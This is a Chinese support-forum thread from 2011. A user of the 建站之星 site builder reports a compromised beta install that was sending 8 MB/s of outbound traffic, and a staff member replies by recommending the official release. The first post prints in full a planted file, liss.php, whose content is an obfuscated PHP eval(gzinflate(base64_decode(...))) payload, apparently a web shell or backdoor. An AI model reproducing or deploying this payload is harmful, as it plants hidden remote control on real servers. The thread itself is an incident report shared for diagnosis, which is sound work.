建站之星产品帮助

查看: 2559|回复: 2
打印 上一主题 下一主题

2.0正式版前的那个测试版,有一个被攻击的漏洞!!

[复制链接]
跳转到指定楼层
1#
发表于 2011-3-14 23:22:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我的网站被攻击了,流量突然之间多了8M/s  !!!!!!  
  我装的就是2.0正式版出来之前的那个2.0测试版,因为升级包还没出来,所以还没升级为2.0正式版,近期发现该网站所在的单独程序池进程 每秒钟向外传输8M的数据,确定是网站被人攻击了,可能是利用了系统的某些漏洞,我把刚安装时的备份文件和现在运行中的网站文件进行对比分析,发现现在根目录下多了一个 liss.php 的文件。
  用记事本打开内容如下:---------------------------------------------

<?php eval(gzinflate(base64_decode('DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLbVkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGYibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci13dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCwxiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOuSJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Awe8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnubV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3chsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
2#
 楼主| 发表于 2011-3-14 23:24:11 | 只看该作者
我现在还没能找出真正的原因和应对措施,希望管理员能及时把这个现象进行分析,提供一个好的解决方法,免得更多人受到攻击!
3#
发表于 2011-3-14 23:55:48 | 只看该作者
您好,目前已经推出正式版,建议您下载正式版重新进行安装。

上海美橙科技信息发展有限公司 ( 沪ICP备11006888号-4 )

快速回复 返回顶部 返回列表